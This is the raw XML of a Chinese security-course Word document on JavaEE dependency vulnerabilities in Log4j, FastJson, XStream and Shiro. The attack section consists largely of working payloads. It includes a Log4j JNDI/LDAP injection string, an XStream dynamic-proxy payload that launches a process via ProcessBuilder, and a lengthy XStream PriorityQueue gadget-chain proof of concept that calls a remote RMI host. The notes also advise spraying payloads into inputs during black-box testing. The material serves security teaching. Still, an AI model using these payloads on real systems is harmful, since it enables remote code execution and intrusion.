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3E6A9" w14:textId="77777777" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="triple" w:sz="2" w:space="0" w:color="FC0403"/>
        </w:pBdr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-JavaEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>依赖项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;Log4j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;Shiro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;FastJson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;XStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074C221" w14:textId="527E5D36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5FD96628" wp14:editId="36C8DACB">
            <wp:extent cx="5274310" cy="1901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3292" w14:textId="77777777" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A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知识点：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超级全局变量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代码审计案例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数据库通讯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身份验证技术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-Cookie&amp;Session&amp;Token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代码审计案例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弱类型脆弱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函数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数据类型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代码审计案例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开发组件集合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模版引擎渲染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第三方编辑器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-ThinkPHP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框架安全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版本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写法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-ThinkPHP-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代码审计案例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文件安全操作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上传读取删除包含等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代码审计文件安全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PHP-RCE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代码执行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命令注入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代码审计案例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PHP-PHP.INI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全局文件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单函数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流量检测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&amp;AI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算法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语法模型概念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-Ajax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-JQuery&amp;Axios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-Ajax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用户登录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JS-DOM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&amp;BOM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JS-DOM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安全案例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数据加密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代码混淆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数据解密安全案例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-NodeJS-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开发环境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功能实现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-NodeJS-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安全漏洞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案例分析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-NodeJS-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特有漏洞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代码审计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-WebPack-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构建打包器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-WebPack-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源码泄漏还原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微信小程序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搭建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架构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微信小程序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编译调试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反编译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泄露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-JavaEE-Servlet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技术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监听器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过滤器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构建工具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-Maven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-JavaEE-ORM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-JDBC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-JavaEE-ORM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-Mybatis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-JavaEE-ORM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-Hibernate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-JavaEE-ORM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预编译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类加载器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反射机制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链安全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成员变量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成员方法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构造方法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动态代理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-JavaEE-readObject&amp;toString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-URLDNS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链分析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-JavaEE-FastJson-JdbcRowSetImpl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链分析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-JavaEE-JNDI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-LADP&amp;RMI&amp;DNS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-JavaEE-JNDI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项目工具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手工原理等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第三方依赖开发安全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数据转换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&amp;FastJson&amp;XStream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、安全开发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-JavaEE-Shiro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&amp;Log4j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日志处理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章节点：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具体点：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</w:p>
    <w:p w14:paraId="1EC8E8ED" w14:textId="2115D39D" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both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3230E7DF" wp14:editId="51C581EA">
            <wp:extent cx="5274310" cy="4467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966E" w14:textId="0C316BC3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193C199A" wp14:editId="29C88209">
            <wp:extent cx="5274310" cy="5097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B4A1" w14:textId="47419F9E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31AED647" wp14:editId="00D0044D">
            <wp:extent cx="5274310" cy="6486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66F2" w14:textId="5F535361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1B5F3783" wp14:editId="53898F82">
            <wp:extent cx="5271135" cy="704151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04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1F51" w14:textId="22DBF305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2EE16EA3" wp14:editId="7EB93966">
            <wp:extent cx="5274310" cy="5581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3240" w14:textId="49419A81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195E3916" wp14:editId="7F71BBE1">
            <wp:extent cx="5274310" cy="58845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BA90" w14:textId="5C95F9C5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4EC0BA9D" wp14:editId="6384113B">
            <wp:extent cx="5274310" cy="4243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DCB6" w14:textId="77777777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演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40520703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-JavaEE-Servlet&amp;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路由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生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E3D037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过滤器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Filter&amp;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监听器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Listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB78474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-JavaEE-Maven&amp;JDBC&amp;Mybatis&amp;Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E613201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-JavaEE-ORM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框架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预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C81E5D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类加载器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反射机制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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541B2FF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成员变量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构造方法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成员方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CB8FA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动态代理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序列化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反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD12E94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利用链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危险方法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重写方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4C2DA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原生反序列化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&amp;URLDNS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链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3EBEE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lastRenderedPageBreak/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-JavaEE-FastJson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反序列化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&amp;JDBC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链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DECEEB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-JavaEE-JNDI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&amp;LDAP&amp;RMI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服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4F5D2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第三方依赖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&amp;FastJson&amp;XStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F475B12" w14:textId="77777777" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A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开发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-JavaEE-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第三方依赖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&amp;Shrio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验证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&amp;Log4j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日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D9CF4" w14:textId="77777777" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A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#Log4j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一个基于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Java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的日志记录工具，当前被广泛应用于业务系统开发，开发者可以利用该工具将程序的输入输出信息进行日志记录。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Maven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引用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、接受输入值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Log4j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错误处理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Jndi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执行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&lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;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&lt;artifactId&gt;log4j-core&lt;/artifactId&gt;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&lt;version&gt;2.14.1&lt;/version&gt;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&lt;/dependency&gt;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String code="${java:os}";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logger.error("{}",code);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String exp="${jndi:ldap://xx.xx.xx.xx:xx/xxx}";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logger.error("{}",exp);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演示：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2.14.1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版本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结论：尝试输出日志时可利用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JNDI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注入触发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RCE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利用：黑盒在各种地方插入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白盒看哪里有调用（见图）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https://mp.weixin.qq.com/s/95Jxj3R9q95CFhCn86IiYA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#FastJson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一个阿里巴巴开发的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Java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库，提供了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Java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相互转换。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&lt;groupId&gt;com.alibaba&lt;/groupId&gt;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&lt;artifactId&gt;fastjson&lt;/artifactId&gt;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&lt;version&gt;1.2.24&lt;/version&gt;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&lt;/dependency&gt;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&lt;groupId&gt;com.alibaba&lt;/groupId&gt;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&lt;artifactId&gt;fastjson&lt;/artifactId&gt;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&lt;version&gt;1.2.25&lt;/version&gt;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&lt;/dependency&gt;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、序列化方法：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JSON.toJSONString()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，返回字符串；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JSON.toJSONBytes()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，返回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byte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数组；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、反序列化方法：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JSON.parseObject()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，返回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JsonObject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JSON.parse()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，返回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Object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JSON.parseArray(),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返回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JSONArray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对象转换为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java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JSON.toJavaObject()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对象写入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write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流：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JSON.writeJSONString()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、常用：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JSON.toJSONString(),JSON.parse(),JSON.parseObject()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演示：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1.2.24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及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1.2.25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版本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结论：反序列化时会调用类里的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get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及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set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方法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利用：已知类的调用方法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自带类的调用链固定版本的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CVE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（见图）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黑盒看传递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数据尝试替换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白盒看调用方法和可控变量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https://mp.weixin.qq.com/s/EPdNElXPcZd5wEmQqAhFiQ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#XStream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一个简单的基于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Java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库，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Java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对象序列化到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XML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，反之亦然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即：可以轻易的将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Java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XML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文档相互转换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&lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt;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&lt;artifactId&gt;xstream&lt;/artifactId&gt;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&lt;version&gt;1.4.5&lt;/version&gt;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&lt;/dependency&gt;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&lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt;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&lt;artifactId&gt;xstream&lt;/artifactId&gt;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&lt;version&gt;1.4.15&lt;/version&gt;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&lt;/dependency&gt;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Car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Car car = new Car("Ferrari", 4000000);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XStream xStream = new XStream();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String xml = xStream.toXML(car);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System.out.print(xml);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Car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String xml = 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上述序列化类的数据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XStream xStream = new XStream();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xStream.fromXML(xml);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结论：反序列化时会调用类里的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readObject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类需继承接口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利用：已知类的调用方法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自带类的调用链固定版本的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CVE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（见图）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黑盒看传递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XML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数据尝试替换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白盒看调用方法和可控变量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https://mp.weixin.qq.com/s/M_oQyZYQEFu0nbG-IpJt_A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已知类的调用方法：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String xml = "&lt;com.example.xstreamdemo.Car serialization=\"custom\"&gt;\n"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&lt;com.example.xstreamdemo.Car&gt;\n"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&lt;price&gt;4000000&lt;/price&gt;\n"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&lt;name&gt;Ferrari&lt;/name&gt;\n"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&lt;/default&gt;\n"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&lt;/com.example.xstreamdemo.Car&gt;\n"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"&lt;/com.example.xstreamdemo.Car&gt;";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自带类的调用链固定版本的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CVE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String payload = "&lt;sorted-set&gt;\n"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&lt;dynamic-proxy&gt;\n"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&lt;interface&gt;java.lang.Comparable&lt;/interface&gt;\n"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&lt;handler class=\"java.beans.EventHandler\"&gt;\n"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&lt;target class=\"java.lang.ProcessBuilder\"&gt;\n"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&lt;command&gt;\n"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&lt;string&gt;calc.exe&lt;/string&gt;\n"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&lt;/command&gt;\n"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&lt;/target&gt;\n"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&lt;action&gt;start&lt;/action&gt;\n"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&lt;/handler&gt;\n"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&lt;/dynamic-proxy&gt;\n"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"&lt;/sorted-set&gt;";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String poc="&lt;java.util.PriorityQueue serialization='custom'&gt;\n"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&lt;unserializable-parents/&gt;\n"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&lt;java.util.PriorityQueue&gt;\n"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&lt;size&gt;2&lt;/size&gt;\n"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&lt;comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'&gt;\n"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 xml:space="preserve">                "        &lt;indexMap class='com.sun.xml.internal.ws.client.ResponseContext'&gt;\n"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&lt;packet&gt;\n"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&lt;message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'&gt;\n"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&lt;dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'&gt;\n"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&lt;bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'&gt;\n"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&lt;bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'&gt;\n"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&lt;bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'&gt;\n"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&lt;jaxbType&gt;com.sun.rowset.JdbcRowSetImpl&lt;/jaxbType&gt;\n"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&lt;uriProperties/&gt;\n"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&lt;attributeProperties/&gt;\n"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&lt;inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'&gt;\n"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&lt;getter&gt;\n"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  &lt;class&gt;com.sun.rowset.JdbcRowSetImpl&lt;/class&gt;\n"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  &lt;name&gt;getDatabaseMetaData&lt;/name&gt;\n"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  &lt;parameter-types/&gt;\n"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&lt;/getter&gt;\n"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&lt;/inheritedAttWildcard&gt;\n"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&lt;/bi&gt;\n"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&lt;tagName/&gt;\n"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&lt;context&gt;\n"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&lt;marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'&gt;\n"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&lt;outer-class reference='../..'/&gt;\n"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&lt;/marshallerPool&gt;\n"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&lt;nameList&gt;\n"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&lt;nsUriCannotBeDefaulted&gt;\n"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  &lt;boolean&gt;true&lt;/boolean&gt;\n"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&lt;/nsUriCannotBeDefaulted&gt;\n"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&lt;namespaceURIs&gt;\n"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 xml:space="preserve">                "                          &lt;string&gt;1&lt;/string&gt;\n"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&lt;/namespaceURIs&gt;\n"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&lt;localNames&gt;\n"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  &lt;string&gt;UTF-8&lt;/string&gt;\n"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&lt;/localNames&gt;\n"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&lt;/nameList&gt;\n"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&lt;/context&gt;\n"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&lt;/bridge&gt;\n"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&lt;/bridge&gt;\n"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&lt;jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'&gt;\n"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&lt;javax.sql.rowset.BaseRowSet&gt;\n"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&lt;concurrency&gt;1008&lt;/concurrency&gt;\n"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&lt;escapeProcessing&gt;true&lt;/escapeProcessing&gt;\n"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&lt;fetchDir&gt;1000&lt;/fetchDir&gt;\n"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&lt;fetchSize&gt;0&lt;/fetchSize&gt;\n"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&lt;isolation&gt;2&lt;/isolation&gt;\n"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&lt;maxFieldSize&gt;0&lt;/maxFieldSize&gt;\n"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&lt;maxRows&gt;0&lt;/maxRows&gt;\n"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&lt;queryTimeout&gt;0&lt;/queryTimeout&gt;\n"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&lt;readOnly&gt;true&lt;/readOnly&gt;\n"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&lt;rowSetType&gt;1004&lt;/rowSetType&gt;\n"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&lt;showDeleted&gt;false&lt;/showDeleted&gt;\n"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&lt;dataSource&gt;rmi://192.168.1.4:1099/rj6obg&lt;/dataSource&gt;\n"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&lt;params/&gt;\n"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&lt;/default&gt;\n"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&lt;/javax.sql.rowset.BaseRowSet&gt;\n"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&lt;com.sun.rowset.JdbcRowSetImpl&gt;\n"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&lt;iMatchColumns&gt;\n"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&lt;int&gt;-1&lt;/int&gt;\n"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&lt;/iMatchColumns&gt;\n"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&lt;strMatchColumns&gt;\n"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&lt;string&gt;foo&lt;/string&gt;\n"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  &lt;null/&gt;\n"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  &lt;/strMatchColumns&gt;\n"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  &lt;/default&gt;\n"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  &lt;/com.sun.rowset.JdbcRowSetImpl&gt;\n"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  &lt;/jaxbObject&gt;\n"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  &lt;/dataSource&gt;\n"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&lt;/message&gt;\n"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&lt;satellites/&gt;\n"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  &lt;invocationProperties/&gt;\n"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  &lt;/packet&gt;\n"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  &lt;/indexMap&gt;\n"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  &lt;/comparator&gt;\n"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&lt;/default&gt;\n"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&lt;int&gt;3&lt;/int&gt;\n"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&lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;\n"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  &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;\n"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  &lt;/java.util.PriorityQueue&gt;\n" +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    "&lt;/java.util.PriorityQueue&gt;";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#Shiro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一个强大且易用的安全框架，可用于身份验证、授权、加密和会话管理等。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开发技术：利用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提示写一个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结论：配置不当或版本安全漏洞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利用：固定版本的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CVE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利用（见图）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黑盒看身份验证数据包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白盒看版本及安全问题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https://mp.weixin.qq.com/s/kmGcrVmaLi0Db_jwKKNXag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB0733" w14:textId="77777777" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="48" w:space="0" w:color="030102"/>
        </w:pBdr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both"/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涉及资源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="1E6FFF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>资源下载地址</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="394FD8BD" w14:textId="77777777" w:rsidR="00B5018A" w:rsidRDefault="00B5018A" w:rsidP="00B5018A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22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650C4BC" w14:textId="77777777" w:rsidR="00791F0C" w:rsidRPr="00B5018A" w:rsidRDefault="00791F0C"/>
    <w:sectPr w:rsidR="00791F0C" w:rsidRPr="00B501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50ECC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B100EBC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ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings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C85"/>
    <w:rsid w:val="00791F0C"/>
    <w:rsid w:val="00975C85"/>
    <w:rsid w:val="00B5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0B13F7-E218-46EE-9EB4-D030211C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semiHidden/>
    <w:rsid w:val="00B5018A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501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5018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5018A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501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0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qq.com/doc/DQ3Z6RkNpaUtMcEF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1932</Words>
  <Characters>11018</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>91</Lines>
  <Paragraphs>25</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12925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2025-03-06T13:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-06T13:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>